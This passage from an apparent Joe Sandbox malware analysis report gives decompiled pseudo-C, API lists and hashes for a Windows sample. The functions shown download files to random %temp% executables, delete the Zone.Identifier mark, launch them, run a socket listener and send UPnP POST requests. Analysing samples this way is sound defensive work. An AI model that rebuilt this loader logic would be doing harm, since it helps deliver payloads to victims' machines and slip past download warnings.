                                                                                  0x0040dad7
                                                                                  0x0040da9b
                                                                                  0x0040daed
                                                                                  0x0040daed
                                                                                  0x0040dafa
                                                                                  0x0040dafa
                                                                                  0x0040db07
                                                                                  0x0040db12
                                                                                  0x0040db18
                                                                                  0x0040db21
                                                                                  0x0040db27
                                                                                  0x0040db2c
                                                                                  0x0040db3e
                                                                                  0x0040db44
                                                                                  0x0040db49
                                                                                  0x0040db58
                                                                                  0x0040db5d
                                                                                  0x0040db7f
                                                                                  0x0040db88
                                                                                  0x0040db8a
                                                                                  0x0040db92
                                                                                  0x0040db99
                                                                                  0x0040db9a
                                                                                  0x0040db9c
                                                                                  0x0040dba3
                                                                                  0x0040dbbc
                                                                                  0x0040dbcc
                                                                                  0x0040dbd7
                                                                                  0x0040dbf1
                                                                                  0x00000000
                                                                                  0x0040dc2e
                                                                                  0x0040dbf8
                                                                                  0x0040dc0d
                                                                                  0x0040dc12
                                                                                  0x00000000
                                                                                  0x0040dc1d
                                                                                  0x0040dc1f
                                                                                  0x0040dc1f
                                                                                  0x0040dc12
                                                                                  0x0040dba3
                                                                                  0x0040dc37

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040D899
                                                                                  • srand.MSVCRT ref: 0040D8A0
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
                                                                                  • mbstowcs.NTDLL ref: 0040D923
                                                                                  • rand.MSVCRT ref: 0040D92B
                                                                                  • rand.MSVCRT ref: 0040D93F
                                                                                  • wsprintfW.USER32 ref: 0040D966
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040DA3E
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DA4D
                                                                                  • wsprintfW.USER32 ref: 0040DA66
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DA76
                                                                                  • ExitProcess.KERNEL32 ref: 0040DACA
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DAA2
                                                                                    • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
                                                                                    • Part of subcall function 0040D740: CreateProcessW.KERNELBASE ref: 0040D795
                                                                                    • Part of subcall function 0040D740: Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DAE0
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DAED
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DAFA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DB07
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DB12
                                                                                  • rand.MSVCRT ref: 0040DB27
                                                                                  • Sleep.KERNEL32 ref: 0040DB3E
                                                                                  • rand.MSVCRT ref: 0040DB44
                                                                                  • rand.MSVCRT ref: 0040DB58
                                                                                  • wsprintfW.USER32 ref: 0040DB7F
                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
                                                                                  • wsprintfW.USER32 ref: 0040DBBC
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DBCC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DBD7
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DA81
                                                                                    • Part of subcall function 0040D580: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040D580: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                    • Part of subcall function 0040D580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                    • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DBF8
                                                                                  • ExitProcess.KERNEL32 ref: 0040DC1F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DC2E
                                                                                  Strings
                                                                                  • %s\%d%d.exe, xrefs: 0040D95A
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
                                                                                  • %s:Zone.Identifier, xrefs: 0040DBB0
                                                                                  • %s\%d%d.exe, xrefs: 0040DB73
                                                                                  • %temp%, xrefs: 0040D8BB
                                                                                  • %s:Zone.Identifier, xrefs: 0040DA5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3135114409-2996245764
                                                                                  • Opcode ID: a416aaf8c19d7d0f3ee08b18e8123934b23fefb66b47613bd15720cd54ae3611
                                                                                  • Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
                                                                                  • Opcode Fuzzy Hash: a416aaf8c19d7d0f3ee08b18e8123934b23fefb66b47613bd15720cd54ae3611
                                                                                  • Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 381 40e7a0-40e7c7 GetTickCount WaitForSingleObject 382 40e949-40e94f 381->382 383 40e7cd-40e7e4 WSAWaitForMultipleEvents 381->383 384 40e870-40e883 GetTickCount 383->384 385 40e7ea-40e801 WSAEnumNetworkEvents 383->385 386 40e8c3-40e8cc GetTickCount 384->386 387 40e885-40e894 EnterCriticalSection 384->387 385->384 388 40e803-40e808 385->388 389 40e935-40e943 WaitForSingleObject 386->389 390 40e8ce-40e8dd EnterCriticalSection 386->390 391 40e896-40e89d 387->391 392 40e8ba-40e8c1 LeaveCriticalSection 387->392 388->384 393 40e80a-40e810 388->393 389->382 389->383 394 40e921-40e931 LeaveCriticalSection GetTickCount 390->394 395 40e8df-40e8f7 InterlockedExchangeAdd call 40c210 390->395 396 40e8b5 call 40e6a0 391->396 397 40e89f-40e8a7 391->397 392->389 393->384 398 40e812-40e831 accept 393->398 394->389 406 40e917-40e91f 395->406 407 40e8f9-40e902 395->407 396->392 397->391 401 40e8a9-40e8b0 LeaveCriticalSection 397->401 398->384 399 40e833-40e842 call 40e330 398->399 399->384 408 40e844-40e85f call 40e5c0 399->408 401->389 406->394 406->395 407->406 409 40e904-40e90d call 409940 407->409 408->384 414 40e861-40e867 408->414 409->406 414->384 415 40e869-40e86b call 40eb70 414->415 415->384
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040E7A0(intOrPtr* _a4) {
                                                                                  				intOrPtr _v64;
                                                                                  				char _v68;
                                                                                  				long _v72;
                                                                                  				signed char _v80;
                                                                                  				long _v92;
                                                                                  				char _v96;
                                                                                  				char _v100;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				long _t31;
                                                                                  				long _t33;
                                                                                  				long _t34;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t70;
                                                                                  				intOrPtr* _t73;
                                                                                  				long _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                  				intOrPtr* _t77;
                                                                                  				void* _t78;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  
                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                  				_t31 = GetTickCount();
                                                                                  				_t56 = _a4;
                                                                                  				_v72 = _t31;
                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				if(_t33 == 0) {
                                                                                  					L25:
                                                                                  					return _t33;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					_t73 = _t56 + 0x18;
                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                  					if(_t33 != 0x102) {
                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                  							_v100 = 0x10;
                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                  							if(_t49 != 0xffffffff) {
                                                                                  								_t77 = E0040E330(_t56, _t49);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								if(_t77 != 0) {
                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                  									E0040E5C0(0, _t77, _t56, _t15);
                                                                                  									_t81 = _t81 + 8;
                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                  										E0040EB70(_t77);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t34 = GetTickCount();
                                                                                  					_t74 = _v92;
                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                  							goto L24;
                                                                                  						}
                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  						if(_t75 == 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                  							_v92 = GetTickCount();
                                                                                  							goto L24;
                                                                                  						} else {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						do {
                                                                                  							L19:
                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                  							if(E0040C210() - _t42 >= 0x1e) {
                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                  									E00409940(_t45);
                                                                                  									_t81 = _t81 + 4;
                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                  								}
                                                                                  							}
                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                  						} while (_t75 != 0);
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t76 = _t56 + 0x20;
                                                                                  					EnterCriticalSection(_t76);
                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  					if(_t70 == 0) {
                                                                                  						L16:
                                                                                  						LeaveCriticalSection(_t76);
                                                                                  						goto L24;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                  						if(_t70 != 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							LeaveCriticalSection(_t76);
                                                                                  							goto L24;
                                                                                  						}
                                                                                  					}
                                                                                  					E0040E6A0(_t56, _t70, _t78);
                                                                                  					goto L16;
                                                                                  					L24:
                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				} while (_t33 != 0);
                                                                                  				goto L25;
                                                                                  			}




























                                                                                  0x0040e7a6
                                                                                  0x0040e7ac
                                                                                  0x0040e7b2
                                                                                  0x0040e7b5
                                                                                  0x0040e7bf
                                                                                  0x0040e7c7
                                                                                  0x0040e949
                                                                                  0x0040e94f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e7cd
                                                                                  0x0040e7cd
                                                                                  0x0040e7d3
                                                                                  0x0040e7d9
                                                                                  0x0040e7e4
                                                                                  0x0040e7f6
                                                                                  0x0040e801
                                                                                  0x0040e812
                                                                                  0x0040e820
                                                                                  0x0040e828
                                                                                  0x0040e831
                                                                                  0x0040e83b
                                                                                  0x0040e83d
                                                                                  0x0040e842
                                                                                  0x0040e844
                                                                                  0x0040e850
                                                                                  0x0040e855
                                                                                  0x0040e85f
                                                                                  0x0040e86b
                                                                                  0x0040e86b
                                                                                  0x0040e85f
                                                                                  0x0040e842
                                                                                  0x0040e831
                                                                                  0x0040e801
                                                                                  0x0040e876
                                                                                  0x0040e878
                                                                                  0x0040e883
                                                                                  0x0040e8cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8d2
                                                                                  0x0040e8d8
                                                                                  0x0040e8dd
                                                                                  0x0040e921
                                                                                  0x0040e925
                                                                                  0x0040e931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e8df
                                                                                  0x0040e8e5
                                                                                  0x0040e8f7
                                                                                  0x0040e8f9
                                                                                  0x0040e902
                                                                                  0x0040e905
                                                                                  0x0040e90a
                                                                                  0x0040e90d
                                                                                  0x0040e90d
                                                                                  0x0040e902
                                                                                  0x0040e917
                                                                                  0x0040e91d
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e885
                                                                                  0x0040e889
                                                                                  0x0040e88f
                                                                                  0x0040e894
                                                                                  0x0040e8ba
                                                                                  0x0040e8bb
                                                                                  0x00000000
                                                                                  0x0040e8bb
                                                                                  0x0040e896
                                                                                  0x0040e89f
                                                                                  0x0040e8a7
                                                                                  0x00000000
                                                                                  0x0040e8a9
                                                                                  0x0040e8aa
                                                                                  0x00000000
                                                                                  0x0040e8aa
                                                                                  0x0040e8a7
                                                                                  0x0040e8b5
                                                                                  0x00000000
                                                                                  0x0040e935
                                                                                  0x0040e93b
                                                                                  0x0040e941
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}






















                                                                                  0x0040d119
                                                                                  0x0040d123
                                                                                  0x0040d138
                                                                                  0x0040d13d
                                                                                  0x0040d140
                                                                                  0x0040d150
                                                                                  0x0040d156
                                                                                  0x0040d166
                                                                                  0x0040d16c
                                                                                  0x0040d188
                                                                                  0x0040d1a1
                                                                                  0x0040d1ae
                                                                                  0x0040d1da
                                                                                  0x0040d1e7
                                                                                  0x0040d210
                                                                                  0x0040d21d
                                                                                  0x0040d235
                                                                                  0x0040d23b
                                                                                  0x0040d251
                                                                                  0x0040d267
                                                                                  0x0040d26d
                                                                                  0x0040d277
                                                                                  0x0040d297
                                                                                  0x0040d2a6
                                                                                  0x0040d2cf
                                                                                  0x0040d2f0
                                                                                  0x0040d2f5
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d2a6
                                                                                  0x0040d318
                                                                                  0x0040d318
                                                                                  0x0040d321
                                                                                  0x0040d321
                                                                                  0x0040d32e
                                                                                  0x0040d32e
                                                                                  0x0040d33b
                                                                                  0x0040d33b
                                                                                  0x0040d34a

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}










                                                                                  0x0040e480
                                                                                  0x0040e482
                                                                                  0x0040e5b7
                                                                                  0x0040e494
                                                                                  0x0040e496
                                                                                  0x0040e49a
                                                                                  0x0040e4a0
                                                                                  0x0040e4a5
                                                                                  0x0040e530
                                                                                  0x0040e530
                                                                                  0x0040e534
                                                                                  0x0040e53e
                                                                                  0x0040e544
                                                                                  0x0040e549
                                                                                  0x0040e563
                                                                                  0x0040e569
                                                                                  0x0040e572
                                                                                  0x0040e584
                                                                                  0x0040e58a
                                                                                  0x0040e590
                                                                                  0x0040e59a
                                                                                  0x0040e5a2
                                                                                  0x0040e5a6
                                                                                  0x00000000
                                                                                  0x0040e5b6
                                                                                  0x0040e551
                                                                                  0x0040e55b
                                                                                  0x0040e55d
                                                                                  0x0040e55e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e4ab
                                                                                  0x0040e4ab
                                                                                  0x0040e4b1
                                                                                  0x0040e4d3
                                                                                  0x0040e4d7
                                                                                  0x0040e4de
                                                                                  0x0040e4e6
                                                                                  0x0040e4ec
                                                                                  0x0040e4f2
                                                                                  0x0040e4fc
                                                                                  0x0040e502
                                                                                  0x0040e50c
                                                                                  0x0040e519
                                                                                  0x0040e51c
                                                                                  0x0040e51c
                                                                                  0x0040e519
                                                                                  0x0040e4e6
                                                                                  0x0040e4d3
                                                                                  0x0040e522
                                                                                  0x0040e528
                                                                                  0x00000000
                                                                                  0x0040e4ab

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
